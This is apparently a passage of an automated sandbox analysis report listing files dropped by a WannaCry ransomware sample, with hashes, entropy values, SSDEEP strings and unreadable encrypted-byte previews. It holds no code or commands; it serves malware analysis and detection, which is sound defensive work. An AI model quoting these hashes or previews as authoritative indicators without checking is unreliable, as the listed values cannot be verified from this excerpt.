                                                                              Preview:.MnI>....o..i>P..d..o..,._...u.I...0..........c...'/.G+QN7..v...3E..?....~[..L.....F.UC"..T...*K.J..3*...T....!.=..v...%.mIOm....R.(.....q..t.`.7.t.......z......x.D...+.T.!~q.C..L.....,........#..FM.==........By].l.rn....I\C.:.+...=.I..5....9z.uhS.P..u.......|z.y..K.+....t.>q(Zcw..aX......VoQ._\....q.e-j...M..Z.^g2..G@;.bQ..t]..G.[.4.B.0....^zy.. ..%..3.....;..r....e.Am.JG..y..H.D.juj.o.2..$_.....C...B.0.....1...\.rv....MDTM.....n~.[y.Z~n^L..I....;Fz.&~<...>P.S.....M..l.`.>N.....VU. ..[..XyR)j.x=.=.1.......Sc....l..[..MZ.......M....q.,..^Mi....~?....wi!.J.*.o.P..Z...4.C0U>...h\..-.....x...-..;r...........ck.GRC<A...-Y[:{5. a..l"}?.e_=...U.s........[.y...PD*FQ..F.^P... ...y.x....-.W .nIbm;.4.......ze.h....(..+...*.!..K3:T.>`s..+.N.qgk.B..9.......<@.^..M`..K..<..].0K............r.$...+.5m..H.u.4TG... ..7G..rs75'.^LfL+x....S.?.)......*P.p..F."..V.rI..5x:.......t.<.t....5..........]4#...c([.p`8.~..'..w.u.&..._..........}.:e.F.......4
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.821508582175489
                                                                              Encrypted:false
                                                                              SSDEEP:24:0uT48sRBmWui2N+NKCGZR/WAAwzawsH0V9P1lYwt3A:BT4ziS4gU5DzawU0VxYwt3A
                                                                              MD5:68F20412AE4FC272957DA3E89FC0BCFC
                                                                              SHA1:1931DB0198413269039F9F4CFCB7DC5F7B41C0F0
                                                                              SHA-256:4A7D7AE91681F72C742D0B5C20FDDDC2F242BD425270789E9A63BE70B7BA0ED4
                                                                              SHA-512:F3E5FA42A2A820C975B1E3A7DC7C913CBF6A77E28DE9E5AABA94CA40DA1718B40C4C6684C3E1B9D8C3B91B87475CE8589F807BBE2EF99809FF92286D8CF0F5F8
                                                                              Malicious:false
                                                                              Preview:k.qX...27...[..r.......eOJ"....5......-#;.^...Tfw<.?.ee..:.P.^..MqrC....-..J..'F..:m.J..o...x...O..E..z\>.fGa..c..x.....}..E1Q..*.,.O..u......A.....l...@....2.........]....^..Z.5.Cv...M.j.T..;g..j.OF...{..u... |..7.&.<.z:J.\"...M'U.K.pA.....?,......;....R.ANG`..q.U....^.\o>.....2.H.=n......s.GsGP@......4......G....z{.|.HU.g._z..v....8.*..!w..B.....&...!.DV....N.}...j..(%D.r3.vNys2.0...m......;F..L......zG&g..`...D.Z.X.m..sh.....<.....]!.\.d..>iO...cn.i......H..M.K0...L.x..W.Y3.s..........gM}....!..S...0..V.ZCr..D8....Ph........W...@.diVw...Y..M......1...............su5.)R..;.'~.Ql`.o.w..nF..G-.O<...c.?.w.:...1f.......w..i}...k..I.....(...*..J:.k..a1+.<.W....#.4....s.m.-.l....:.d;... .m/.g..mR.X}..G...Y...JMjC._2....&Y.M.C....9..)..So...].'.a...[..z.4nz\aO.......0..M...*......r.+Fs..IV...2.{.Lj/V..wg...BT..9.q_.(go..VqU..A.x...R3..h..^....6...A..v......t...lY\_.......W....x=.6....E%.Q..LM!%8O.yi*....ZN"..;D.r.....sD..#.+%..@..V]b.y..M.P
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.792654943027224
                                                                              Encrypted:false
                                                                              SSDEEP:24:v8++HTOogvtf4LoHuXXjDgMBy85Ykuo28U5mGVLaPwL6Jkm:k++HcpUmuXXoXpkHa6em
                                                                              MD5:B69AB8B9FE4AA388A2188D8E9A1CA0FF
                                                                              SHA1:420BB120E3C71ACEE303E39FAD81461D9D8E966A
                                                                              SHA-256:C4E6946D51A4EE80C2E8D87FEECC85D22ABCC2DB64E5A876A51D095589D3CA0A
                                                                              SHA-512:D1833D5F01A093CED1DC863F3B2FBBFFA5A85214265FCA148C4C301CEC97FA4B1DC457F7A821B674250A380498A948740C2B6C0CBBAB49CD547583AF143B5CFF
                                                                              Malicious:false
                                                                              Preview:.....N...T.I.%...?>.9....M7..W.W......K..,....4.6.K4....:|..n5..H.0&.../.'..>....6...kt.Z..=...I.9Ok.>...>w..>.U....uA...\..8........W.Z..k ...[..5...}..e;....h.....Cz....U.......D&.`d.IY...4.{.*z..^..[.c.. .~V..C...NbD..P.t..a..U...`....!.;H.ne.M.w.... ....=6...K......P.I.....y3K...9....>'\......ZG.0.......L.6..L.0.....y.H..J..iW....o.N.'...<...~...W .8........DF.$.$.K0...Z..0..#`O+....3.........V$.]...>....P.y.\...YIY.J6.C.......d.1St.rv',...y....o.V.Q....E....*....7..R...C.[...i.k.........,,j.8-k....ZT9....7.AI^.$.}B..k7m..|...]RQS..y\.A...w......... !M+....&..<...".......6.iw.@.@.."...V...+.. )..'..Ldx...A...~(.........._..j...AJ1.8.Q.....".Q....&..........1.>(..Z..j.(S'.x.|.4..4.j.b..VR....}..(....Ag.Ua...~.b..-.'.V.^.\[..+r......;5..Q.[.?...J.e........b.$.._.Cq...{WHz.go.R|..?..Yt.2P...].....L.#....r.....A.....S".SM..O.0;.s..$..U.-za..\.Ax.%............J.@..-...~.X1?sm`.._.............^..:.}..p...KG..5.......F..].s.....b....x.V%....Q..S..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.828106730683323
                                                                              Encrypted:false
                                                                              SSDEEP:24:u4eZOJcOjIfSajIW9rV5vTCrfuLAy3Lm4p8uwDtJLb7x8/hpGOn:unZOJ0SajJLL3LhwDtJLxsfn
                                                                              MD5:4A3062225C4CFABA8C472AB791E77700
                                                                              SHA1:573B46912B78E88E0F8B032B4D5B5212DA23FF7B
                                                                              SHA-256:2AACE75E11905C67223DF174257617473A4F665F0282527C11E6ACD8712A9A34
                                                                              SHA-512:0CC8AA4E71AC9A9F274CAE3390EEA6AF16F95A9315A42D027A9CED2BE2EE6EA8A269E839261353F812A57D5D7042391F02631AC52DA2757B78360629A67466E7
                                                                              Malicious:false
                                                                              Preview:..........c).g..J4..:...>.7.1.....@...l?....4..g..B^..y[V;Y..pg..(..........~..,..O..K.Tqp.PB...?Ti*...5......+R./..$&a.l...$),=.E....F......x.A..Hd..........Oeb..=s..`..8q.h.QH...y.H.n...eM.%......$..|y._...n.W.r.@Qs..nGV.SM........4.y.......;....K...i.RB..9~.......i.....D....B.]..VzZ.i....0.1Z.._Y..o:.1..LoUo....3..*.?..O.m.j.....Lyt07.c/.?v...._4.6.-r....@*.x........e.A^...rp.......h..+.Z.L:<..&JML.K.K/?1......`..z..]:0......Y...J. U...A.9........9..N....-..B;E........,.*2c.6J....7hkqO..........KHkHw2..t.....p.)._.`.w.....\T..`..<......'._!....F.......1..r..]moV....>............9....e.F.?.|_cu~*.T.cm.f..c`.o.i.T...:5f.B....%l.&...1.+v&Z.6.kH.....{..g.._..0S.!....\...*...J./.....N9T..Y.R..........^....I......s.u...)....QH. Sl.q...Qd&.0.[.yA...K..d.".-.S.d ....T...8.2p.>..}".y..B.\[1OOyq".2J.;...VM.o.8..m...0....ie&.U.....p......[..`....~..Z.E.p...5..U.....S....G3...6S...%.1h.I......f.9UU.7>.........bU..Eo..-@W)A.G.I.V.4.=A.1Y=...*..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.811356510055264
                                                                              Encrypted:false
                                                                              SSDEEP:24:Iii+Rdn9NS35NUmtNG5CPkPs81LaeJ9lgp94NFPOYPzBDE7X:Iiiuna33UOkPs8haeJ9e4FPO0BuX
                                                                              MD5:76FEB7A2983BEF05056F09DCC658D9C6
                                                                              SHA1:8BAE42C75FB2DCF3E1978EE1A08E6216FC676DD9
                                                                              SHA-256:B0BC09618A502B62A04ACAE65D023D24D8B29B36168D293DF4E03B62B0CF8A1A
                                                                              SHA-512:463727AE051DD5A4872B1C3D3FC78D0A497261D45044327B9264466DDAE9E1A97FF2E2C990B84A6C28AC11152022B26E637DA97A6A6D4B3CA6834522CCE84A06
                                                                              Malicious:false
                                                                              Preview:v..:.e.S..R. V.g..o......x.!Z..."..}..2`.{.i.hc6I..b...;.3...-...m..V....{z#.......sB...Z.'!..D..9;K....%..(`..w.W...@Q}...vc.P...6.0>.>IQ....6....mT.*.L].8.2.........l..L..........0......;.`....A.LwW......26...u..Y.&...zj.M>*...[0.u.Wv...Q..K,j....?.R.U......gA.Q.Q.m~.....YQ.c.$m.%.H..#...(...r.h.Xc.Q.j]c.<..^.. [....y..oL..Q<.bY.=..K.........mSc`q......l.s..Ic..v..~H(...(......>...[<Q...Mt.B.p.kren..s.o.7.u9....E...C}|....:t^.%[...j..\L".y..;...4.S:.).*......".,...l4.4.!._.B.9.IF.*I8.v#/.,.e..:..;%h.0.UY.*.....8....T).8....)8d{~UO. 5#..).&=@.36@.}..|oH..2.&..*Y 52.......5.L..sZ..~..e...b.(Mg.|.b.+!.....*.h....9.P"....j._.y2A.;J..x.m....@QO...K....z&K3..,...E?.n..;.&Z2l..*...[...*9.G.>.2&.....(..*AM0u[\.....w1l....r....].O...b...q..s..3....._.c..@H..?0...3.....,...V.dp....7....\..`;.W.aa..S.w...W....`M.sx..6..B...8...)..f.....U...e..Z.._s'V1..v....{.........#.~oQ....&....).....|.H./.....&.'..I....AhT;....o.S...~.q$..u_......Y.[k7c.0.`..Dv..J.n)
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.8128587573164126
                                                                              Encrypted:false
                                                                              SSDEEP:24:FuGLlFiXV3MWug79Ohaw6Bg/34PiAsIFr5w:FuGBQ2sa/IX5w
                                                                              MD5:B1530C31B6BF572C5A6C2DCA8C88DE4B
                                                                              SHA1:DD95B075BB58EBCFCE45698170F295256B41938E
                                                                              SHA-256:604D2B683E416453322BF02435AC97230632BED259FFF90247E670FAAC68088C
                                                                              SHA-512:80907F40E4129ABE4FDEBF2A747EC5374D30CA555C91B2A96ED4494E3D936DBE30125808DCFC1CD1BB239CF3D214B4EBBDBD1A60F2576EE5B697D6F565F03516
                                                                              Malicious:false
                                                                              Preview:..J.....|)6^{.r....T.e.V...Rd*..IS%..i0..1..V#..[.......a....C\U.....i)o....S.a.5...i^..... R...H.mr...T.......`a.Z.....d..'q...^....n.[.]...D....8.-.%NZ..x..1...n..W..D.q.....J.....J3..+.|~I..G..{..Z..T....B!...Z...\....1k.?... GU......}..l...4....~....n..mE.Uq.f.+...`V..&.0..%t9..X...\pp.b..../.._$<o.....z.../...n........Nb.A..%.SR.".n.?.q.?{'!..yF4..(.{.'a_..../..j~....s.1......M-.R......]O....8.jwR......p...W.oX..b..W[.(.S.{..Q.....O..A.......(f...&..........\..1........KJ."o...}P..N}....YmA... 1....9.).5B..sZfI...e.~..@..!..'.H.t..)uih^.J......sF.C..p7Q.m..\.._T.....J....)e....?X<.y0.....h..o..s.4t.Ra..)L+=,.)F{.....(4=>L.......A4....)......W.@.>....`.}.)......{r....9.......Y..41.P..)oA...h..#...Y..;]$.....<Q.I..s....*..yrh$>G..np.%O..Y..TM.zzdF........+.!.w.......\-<C].$..1o:z.s.....{.G9N.....k.r..!...cO.x..3..hy.<..........4.$Jj...n..Y...eQH.0r.m[..U.9.=7X...|.wt.V.$Z>....;..P......6#K.v......*.c........S....|..',..M..u..;.0.v%/.=5.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.808663679158851
                                                                              Encrypted:false
                                                                              SSDEEP:24:TC9ClO887T4Rh9lMBdQ3ynb8iCnyMKFtLYAT:W970T3Qb8iCyMstlT
                                                                              MD5:DB4DD7B8F192D909C28EDF7D9BA98B2A
                                                                              SHA1:54B3F8F0CDC6E4B06003D6308299D35E2F8E689D
                                                                              SHA-256:08DE54C77EB89B9D439755DF41E86A833A30856A47BDC569130872C7D3B51C37
                                                                              SHA-512:895B67A10698025DDDDC686E1316FA03D1CB0C2D6618CAD15F1720E059175097FF3EB44918DBF3DF791F19F8A312AE3D6CB430F9B330ACAA799456246FACF39E
                                                                              Malicious:false
                                                                              Preview:..Z9.....B...>.".i.%.ZG._.....C.Q.-..sI.....i.X.J.`.I./.#....5KH;..w...Yx.g.H...Q...!.m..LP....Qq.....sW..x.lZ.es....r....o....OJ..F..\.. .....t.x..c..S[.`L2..c.WC.......&.A.%.{.y].Z...{.e....C...@F.T=...*..X...Q.......5...i..V.!.z..._,"'.....S.Z\.B.....j.>-]P....Y..#...*A..T.x1;.}0$.`.w....j..=.%c#/o<..C.M.)7.[6{Iu...5.&....V.2.....V..{T.VCRe....\.O..Ox9x....K....|..(.....&$.w/.5R=e..^...Ll..m..._Fo....nsr..n.|?.f...........}..m..h.....m.b>%..TrYN....a.=.....j......1.V...9y+@....$0.e9..;..|.....H)......B'..,M...o.....|^C5...^.n..p./..$w.^.>.~..i-..q/|D......<..Q.~.8....(.....6.$....%..\.T.3....i|..J..'..a..G..P5X.$.....>xdc.jh.1"..0....7..y^9...N.]..g........yI..gX."..?...B.q.....>...'......>.....N.e..B.$/..@2..-J.}...z....L.....#_2.L:....._.l..K...3..P.m.E.3.Yy|"}.*NF\&..X...:..8.z..6.._.RZn....(A .|.GR.H.+......Pr.=o<.....;fIW.A.....C!.]...j..".....L..;.1.....]..&..4|...<..._(..\....5.J.;(.=..C.....h.q.......(Vr..2m..yE|..`...-+."xD.9,....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.770382246708573
                                                                              Encrypted:false
                                                                              SSDEEP:24:r6wFaywEi1v9f5d+Nha1iriIPpQJTE9be:r6wQ5dll
                                                                              MD5:1D23734919BD83A69E6D37912E4713DE
                                                                              SHA1:1703EA68CE23B9C5184866A3E0D7087C760EB911
                                                                              SHA-256:2DD1F2B2D359AAD5D5B0919784DE0B881BA79317095899FE926194A564ED92FB
                                                                              SHA-512:703FDCE92608F7AD3860AB06758B850D5561B68B888F85EFA5C132B3C000A091A9ABB2ADE457C701C6A86893F13940A32EA0BDC1367A7743458B823DC3A2FB21
                                                                              Malicious:false
                                                                              Preview:*G!.F?.@.O.@...>4e..k....VN.!.^M..F..g.+=..{....0......E...qn.8N..|...fZ.d....g...<.;..3.....*.R...v.;q.*\-1!..s...d.]...~.hP.C.C).v`.....M.=t.....?..+..W....QeA.W..~OQ..la.Q...O..c...@..&.uP+..dX....\.3.v|.....t 6.........|5...........%1.....iJ.8V.....3u.... O..y....|.9..9.s.6 ......r.EM.h.[..V.f.p.....]...5........1wk..".L...m.d.79......v.T.d...xZ.3.>.\..@W.@.4.^.D"......._.#.K.*]..B/.W...........^yC..._.p\E$..X<.a7t.G.i.T....b.~..0.B..M..["..E.Q+<....F.-..mW19..{45&.`.|...>..VA..Q...l..~..|..U..L6.mS..y".[.M9....k........@..&....G...).2r&X...@.....7.|.fu...)c2 .:?l.d.@...(l.P{..Qj..k..;.....c.c;2..3..m].3-.5.%...V.1.R...y.P.K.....(a./|...Zv..8.FM.......T.4.".-.......'.o5.E.r&.c..2OV3Ky..`0....d.M$..........+U..$)u.G....2"..q.I.b..%5.vA.ky.R....N.....zlG..26..oE.~......J..SX..\...x..ry.W....o.D..2.7.Q....'|..*....K......2.W!<.XJ......... F.@q.J?y..dB.g............8...i..A.Nw%...w`#...u ...t..B......'*.pV.N...D[fJ..R.3..M.....5.v.........6.V
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.812986456990108
                                                                              Encrypted:false
                                                                              SSDEEP:24:uOxqi8a8+CApvyU8PhVZncmCD79MuiGs+aIOXmsyzuDx1G6:ii1CUqU8ZVNxqQD9XgYx11
                                                                              MD5:1E98877B9A56680A9EC3F9000021023E
                                                                              SHA1:8CD0DB6DC0058FB9614B12166FC2E2082044E1A9
                                                                              SHA-256:780B4676AB080A054AFBED7E2BB867787E3739BFCCC33AE3350274D8CE7AA5EA
                                                                              SHA-512:59D7730FCD8D545E234AFC5F583466FBB8740D06AF9ED3FA882EAE47B006FB54E7495CAC73E2E6D50765B1CF67A435C9945BA47A31C4E1884F3F230AF13EBC92
                                                                              Malicious:false
                                                                              Preview:Q....Eo......TGErZ..P"..?...7u....9..Rh.....x5.)..'.%;...l...P.M]::..T..%.^...x.@............{..........m~..'.q.M.+C^....K.&`..yW./...O.l....K..t.Qo.0...=..:l.6.9.7E...S...C..".....vl]E..+...Sj......,../.....b......R......9..N..&F...{Wo..YN\.?...Hf}j.Rg...J...PI...D...9.&I&..d..kz.R?}..~.....~.......y.H..f80...5.A...*.A..B.<.....3.(...2.<..qw......e.Av.%.Q&.>.mU.;.....!..^..y.......o...*0.t.n.V0...sFrc-Y*1....)..Y.i.<..S...[..../...z...&.1.......v.y*.g........m."1....5.h.8f..<_'...|.-.i^.......Sj..A2.7<.....G....1.A^Y7[~.Ch$..E......Z"./..sk.i.??3.K..F...LZ.G.NQ.r.........8.=.0.O/p'.*[.0}4.:...#.t.+..x.tv..a..[-.^...O..dx.yRN..u2...2"...#..~1.+...m.:N..}@{......y.('.....R..(G..L..PW.5.h...9..l...x...1.....;......7.:.:....i1m..A.%*.i...-7.Zw].V6...p~..q7..Z.G....^.Q..?wQ).:.=....e[...V....l=.6..7.x.]r."..M.d06........).@..6.".V.O..8..4.*.$C..x?.F...%."9+a.r.......U.vW......kM.C................#.I)..T|j.U/X..s...[aS..g.|(.g.3........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.801229453987464
                                                                              Encrypted:false
                                                                              SSDEEP:24:xztYtoSM8q9lzkGNS9lznrVXJMg3vSQ6z3tdO9b+bUTLsjNsmIVLgMYq:xxdxHgGwvnrVXJpfb6z3tdOT2IFvH
                                                                              MD5:5BCE62736E564FE9C33DC10D35828571
                                                                              SHA1:7A44DABB28DC44A270981A25FAEA8DE26332A83C
                                                                              SHA-256:E4BB1D8788D2DD6B9165CF422C737449BB142B35ADDCEF65D10A857CB921E056
                                                                              SHA-512:E126AEF1A679F7FBFE18582A76C8208D41C27B4C670CCFCA6DC095C3CD95F6C290C46C6E8BC3D516777FB7BFF220C6D19D932A0904C4B1601A6DF8C4EED7FB0A
                                                                              Malicious:false
                                                                              Preview:..{.I.q...n.A..F..C.[Lv.`TQ`^.MMS?.D.'.. ...."i.Z..Z..j*..9hy.Gs]r.!.4A..3..../.t.........EQ:tk.L..J?Q&.T..K-..{YN.~!.FS&}..j.b.......E...`}g...lO.(S.......qH..K..n{u).!..O..5..5.NQ.S.vHVr.lp...[.<.....74.c....K....X.."...2.~..b!....N.BD.07...c.|./.`_.f.......U ..M|.|t0.._Bm>s...)...A..t.>...ib.QR $.......\#3H.".W.6....`.3.Y._.W. ..K..`....o....dJ.3=..J..e.T.y.#+....+R<@...X>..e4T<.....z#+...Z.._....w.-..;%........Cm$-....y|.G..nb....O6.}..fr.}..L@.&.eN...!.z}..5...Q....-...M..6....P.I..N.ZT.^.....<G...R'..2..3.......Y..J..l.]..VF.uB..U...(.."..E0K..EI]....AJ...8...d......].X:p.B...h...........5!...'.5.e......A.].T.u=.Y..>...9/ .....$5]:.w6.....p..V[...T?.*...Z..I....%..?.Nd.K!...u1.c....&.T..]...-.Y...I....<.o@.........t3...$"..<$r.z=.A.{r.1.~|.=d.J_....=..../..JM8...nG.S.......8.8....;P:.Ib.CrJc.... C.)..J?cV........U......}.Lu.....#...:..o.....m..........,...i.r......#.{.au^...o.~|...x... .@.B.K..m:...M?;R/}..}7..J.1=.....S$ou....J....(..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.810817450449458
                                                                              Encrypted:false
                                                                              SSDEEP:24:WJP/6CoKs8oo40tYolnobzjZMmpcF6J7C4Ufs/+AzgfTY:WJar3rPmYy8zOmI4UfAzg7Y
                                                                              MD5:C56BCF10A25D885203EA798EDF04FC19
                                                                              SHA1:E00C71DDA2A372325D47946A5BDBBEF17B2111B6
                                                                              SHA-256:C5BCBD24235A8E5EB6C26CFE3D0E9EB9ACD44E67FF6D798F2F92BFFE846B912E
                                                                              SHA-512:68B8BE025271E79D0351DD0657C9F50A8192F4EA4CEEA5029AD0F376E5FB11D9C753C7A8103E31D60826CBF5F94D7AFB0869DFB01D1F44E788A4ABD4B6594A10
                                                                              Malicious:false
                                                                              Preview:....C....c.N6..:?.A.....v.._{.1a..r......b...A..U.....x`.......%.$....$...z....Qu4.<.i|.O....b%.....p.C.B.4..C..!...d.f-..+.6..>.S..B^V.Of63..7B.SA..j.....W.M..&......(......<..RZ.-}.,..'h~..9.+nm..r..b...c.`.....t....E;....qY..I....Hx.K+p......@[t.(t.:x?xa..% '..O..h...e`Y@.....w..$..bT....p./....NW#.1.vD..{..~...........I.D....)^..K6...0.h...L1+.snH..8.....Z.....J&.qB9.-.cc..(E....../. ...:q0..,..v.SC..........v.8a.....,R...<.v.SS\.Nn.b`...3....r...SMe... N1.f.&.Kn.8a......3..Z..F.....|..Uo.E..y.d=4.-....vA./%..r......^..%*......!.:.l..5..f..6X.Z.m.;o..,J.T.C.;..xOO......D=.....x...e'mh]....[.tIvC.T..`....%..A=..4.L...K.{['a.W..&.p.9?."9wz.SW:..3JGc..).R*....d'}.!n.x..O.-..^......M......O.z...w}=....u....Cf..N...i.8.Ua..2.D"..X..NaUh....y...[......E,./..za..;*...(......#k.I........ar-...r.....fg....^....J..a.nD.!..h..y.A..L......&..y^9....<...a....;..z.....o.,..?..-...-..My..{.T$....I.Z..tS.6.R.....)_.O.R3..)|..!....$M...uN..A..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.805002539785193
                                                                              Encrypted:false
                                                                              SSDEEP:24:E2DSD49XCZNnnoe/zJjDBMcqHtUu90mxnrDEMbNYFaX:eNnrTGNUuP5WAX
                                                                              MD5:653319EA89549A13FAFBDE461E79C50E
                                                                              SHA1:7093BA72C82C0B9A96087E75112DFE0FBD8EE375
                                                                              SHA-256:0F63CC5FCBD18C714F70A792BA88E40F7F49C219B8A9B5A601B81AFC882107EF
                                                                              SHA-512:FB23EB5EAFF4C53FD44F5B56E73A7C4D43C89E63E799F70AADB768CB86BA389FC09D924A94C0D172C143BE5F2E7E10C54F1B7A818F7DA5274A1EDDCC119296F6
                                                                              Malicious:false
                                                                              Preview:......../...-`d.@........~.f....r..zD.6v.iO.......t.?@...P..|..)f..`^N....6..ti....z.d..e.......=b.O......q...j]r..Y....F.$....=......\.z.4.{....L.<1Z.D1.&.l..kl..K...\.yz.N..3.....OM.....+....p".Z[.Zc..M.'......s....x&.\t}&+..x...Q....i..\...\.2...?.+...5......w.....9..j(%..~0..A.+......5.v.!*.Ezv.:....R.i...j. [`..{.$......Z@fbXX....,.]......3.z.z.t.S.=...:......._..J}......@.I_a.&WY0.x...FQ....s...s...j...5...Lt.k..../F3)....&#.c/..|GE........7...YG.p^.U..ZIe.)u.p.>-\...Ul.U^~h...EV.s....LjA.GYj......X.).....+.....8.]?....ou....7.z..,.B..T>....>.M.p..x...8o.....'`.N..4.KL..WS.d*....kr.O.&5F.~....%."vK_6F.S0K.=m.U.H...m..<...*>.|..(.(/..K):...$.!.....[j7..V....V.K .F..A..v.......#..k.e.[M.P...e.,...=.._.q.....Y.#]Q..E...p..f#W....T.7.5k..?.$i*....B&[...{....-..........3/.c..P....x...-'.:.m#FI.P.R.s..t...X..a..,L.us...k.k.....?..X...\..]i....N..W.{(...|kH..%{^.X.F.....K..W.D....#S...M.57..P..<Y.+....."R..c...m...L...6~....xp..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.804549268827118
                                                                              Encrypted:false
                                                                              SSDEEP:24:DQhgyrYOIwqOUDeKFvF+5lOmLTKGuGo7/n9RPrT:DZyr1qnS2EXLTKp3/
                                                                              MD5:1D9C6D4C0293BCF140EFCD745AFA4A47
                                                                              SHA1:5D1C68519DF01F724469921C967A8A415F34AEA5
                                                                              SHA-256:C122CA6D1A59D125EE1044E5039DD646290DACCE62651A33AF749AB2DC920F5C
                                                                              SHA-512:DE2C9DB721105167264C41E25C7DC156B40F0BA183635735E840393A7412346752C1F8EC408CF3E0D9BB7D7E9FFB07C6E228FFF08DFAC270E21A9EF80A25A018
                                                                              Malicious:false
                                                                              Preview:.%.....Ke...$....#b.o.U.?R...0.}.....W....(..3.%..H8x6.......).o.k.R.o..$.....*..~.c&u.JM.nd.o...8.i..~]......Z..z.2Y.j./...ow.q..r.v...Lz......A..U...(.P.....N..|..^./.... ......K...)Z..\.j.b..r.Y..8z6M.^.B.i./_................. /.!.b.._.7..2.CK#..t(.!u..._..[..6.....6Mz;N4U.{4":.IC.e.Y.E0j.=..>.....G.!.;..a.."?.s.#%...^.X.(#...5....q ..N..*x...*j..9R..0....+...6.l`.`n.....*.b.R98..M.l.s.J..A..".....vr7.y.;/=..E2I8o...~.-..U.%d..w.{2.JH.....n.....P4......x....1f...0W.L.o....%cK.I.f`.....0.R.i.x...?.N..v.?......`#@y.|..3..m.`..>>...A..;~a... y:..^.w..&..{...$s......#..Q.........op....i...;.!b*S.............C..=l..Pj!St.=...S...D.?~Qt_...E..U\.=.O..e.q|...y.].:P...Y.y.r..&].......}.}.z...&)..q...l....{..N.(...b54|..3!..|...-f.6.{&@.m. ...<....G.~x)|l.}.m-....%.2..T.X.- 9,.E...t.n..&H.f]{...=Z..zkW)..%>i/.5.|...C..[.ioJ......^.Dj.........o.l...e..#<S...R./64.l...5..\wT.a..ZMj|...".......SZh.............r.......MeC......"#".h
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.803031942558827
                                                                              Encrypted:false
                                                                              SSDEEP:24:FzTVPGKc5cPMceOxZgvvhnuf+pZM8EtWA9Lp1pkCIu:95+K+gMcdZsZaaM7v1KCIu
                                                                              MD5:B1D8F69EAE08697C05761E6448425865
                                                                              SHA1:EC7FCD8DF3B43B6C53F2261F431F59130F76C442
                                                                              SHA-256:9D95CFC9E0A9CF540971E19E2400D3C46667B053EB9ABC4C4DFD5F5C45137892
                                                                              SHA-512:9636617397F0BFA55D4BBEB16E12AB87BF63D9F3A225D6EF0868E33E2693C539FFCCC07FCDE4823ECD4C6BBCDAD4F65A015C7C4D7D21EFEE41FDD1A91B3EE1F0
                                                                              Malicious:false
                                                                              Preview::.lG'...q..h&......<c..@....,..:......-..#.....J..q.....dD+.Cn.v..%.t4...q7.H..>Yn.q/..X....T...~.h.........=.c...).S..J.*&^_....XxT..).1r./k&N.,#...|S. .....]...hw.z.-i.{.9m...(>.WJ...?....v).{....?>.{Z...D,...z..Y...?Ty.....W.wi.#3S.8..{.I.=/.Z.}.n..P.6.......L....dR ...,$.J.7h.!...z9.g.w.a._cX....6....;R.'."fz.....T.waV..I.R,Y".M...e)...[.}.......y.vjGE##.u.b.T.....h......&..s\...o.w.7.....*y.......b....KNf.?...E.#."..).c..sw..x..~+......k/.6p<I.&.I.....EP..a.M...L..h..,...]I..Kv..m.fa>..g.X;B.....DDv.(bl...J+...........\.'.Y...6|U......-.,.....W......+V%........).B~+Qp....&..cy.\i.....h.'_.......1.........h.o..B..zO..Sf.p.........72..WD.x.X....y..' ...F..%>....T..0.........x. J9J..f.C...H.S2...c....z..c......Q.i..0].ij.KH#.=..sqVqE.W..<.0..IA.....b"...."]'.XxSH.2.F....;8t.j.....c|%.AG..GRah]...E...y'.~.%..(.qm.0......qp.R.Xe....[P.P(....F..z.."Fds.j..3).I...........uNF....<..x+..!...x....Z....`J}....:Z.fc.......L......T.?r.ce........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3483686
                                                                              Entropy (8bit):7.99939462751393
                                                                              Encrypted:true
                                                                              SSDEEP:98304:Wn8cFn8cFn8cFn8cFn8cFn8cFn8cFn8cFn8cFn8cFn8cFn8cFn8cFn5:6VVVVVVVVVVVVD
                                                                              MD5:08D69599C749CE7EE75D2753B7C489CB
                                                                              SHA1:648DA1D938FB572D6245BEFFB5BB082948279A4E
                                                                              SHA-256:A36C62383E16E997B51F99126832874DE522A3D15E835AD7A882E8285AA681D1
                                                                              SHA-512:CBDE7DE24F91B5DAEBC481FEB5D51CBEE15B785D58D682AEB9C85BBB17284B97DA6EA802098EA888D3AA838060D6D0CE74209CF8C3728FC38FF6CD301886B1C3
                                                                              Malicious:true
